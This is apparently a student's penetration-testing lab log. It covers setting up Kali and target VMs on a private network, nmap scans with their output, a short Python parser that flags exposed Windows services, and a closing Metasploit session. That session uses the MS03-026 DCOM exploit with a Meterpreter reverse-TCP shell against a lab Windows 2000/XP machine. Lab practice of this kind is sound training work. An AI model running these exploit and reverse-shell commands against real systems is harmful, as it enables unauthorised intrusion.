pentest log

friday 19

re-imported kali VM (newest 2021 version may have different settings from 2020.4)
checked that all VMs are using NatNetwork
launched KaliVM and msVM
logged in to both VMs
obtained IP addresses for both machines using ifconfig: msVM is 10.0.2.4, KaliVM is 10.0.2.15
pinged from KaliVM to msVM successfully
created target.txt file on msVM and inserted some text, saved the file in home directory
used touch and then nano editor
nmap
carried out nmap scan of target
zenmap not available
explore legion instead (runs with sudo)
legion allows session result to be saved to file
auto screenshots services such as web server home page, tomcat home page, db and ftp
list of cve vulnerabilities with hyperlink to cve database
setting up metasploit framework
find an exploit
deploy exploit
configure
deliver payload
explore target using shell
finishing metasploitable session

monday 22

Setting up Kali and Windows


Kali settings: internal network [screenshot]
Windows sp0: network [screenshot]
Secret file on Windows [screenshot]
TCP/IP properties for Windows [screenshot]
Kali Net settings (right click network icon in top right) [screenshot]
check for confirmation of network (manual setting for ip4)
Testing Kali - Windows network connection: ping [screenshot]

Hacking Windows from Kali

nmap scan needs sudo
sudo nmap -sN 10.0.2.0/24 [screenshot]
port scanner
sudo nmap -PS 10.0.2.16
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00032s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
fingerprint the target
sudo nmap -O -osscan-guess 10.0.2.16
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000::- cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::- cpe:/o:microsoft:windows_xp::sp1
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
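As an added check that is not part of the original log, a small Python parser for the nmap output above: it pulls out the host, open ports and OS guess and flags the exposed Windows services a defender would want closed or restricted. The risk notes in HIGH_RISK are my own assumptions, not anything nmap reports.

```python
import re

# Constructed sample: the OS-detection run from the log above, trimmed to the lines the parser uses.
NMAP_OUTPUT = """\
Nmap scan report for 10.0.2.16
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
"""

# Assumed risk notes for services a defender would flag on this lab box (not from the log).
HIGH_RISK = {
    135: "msrpc: RPC endpoint mapper reachable from the network; firewall it off",
    139: "netbios-ssn: legacy NetBIOS session service exposed; disable if unused",
    445: "microsoft-ds: SMB exposed; restrict to trusted hosts or block",
    3389: "ms-wbt-server: RDP exposed; require NLA and restrict source addresses",
}

# Matches nmap normal-output port lines such as "445/tcp open microsoft-ds".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")

def parse_nmap(text):
    """Return {host, ports: [(port, proto, state, service)], os_details} from nmap normal output."""
    report = {"host": None, "ports": [], "os_details": None}
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]  # assumes the bare-IP form shown in the log
        elif line.startswith("OS details: "):
            report["os_details"] = line[len("OS details: "):]
        else:
            m = PORT_RE.match(line)
            if m:
                report["ports"].append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return report

def findings(report):
    """(port, note) for each open high-risk port, plus port 0 with an end-of-life OS note if applicable."""
    out = [(p, HIGH_RISK[p]) for p, _, state, _ in report["ports"] if state == "open" and p in HIGH_RISK]
    os_guess = report["os_details"] or ""
    if "Windows 2000" in os_guess or "Windows XP" in os_guess:
        out.append((0, "OS fingerprint is an end-of-life Windows release; keep it on an isolated lab network"))
    return out

if __name__ == "__main__":
    r = parse_nmap(NMAP_OUTPUT)
    for port, note in findings(r):
        print(f"{r['host']} {port or '-'}: {note}")
```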
Vulnerability
Exploitation
msfconsole

search 'MS03-026'

use exploit/windows/dcerpc/ms03_026_dcom

show options

set rhost 10.0.2.16
set lhost 10.0.2.15

show payloads
(displays 183 items of different categories in a wide listing)

set payload windows/meterpreter/reverse_tcp
exploit
(session closes / dies, Windows closes and restarts)


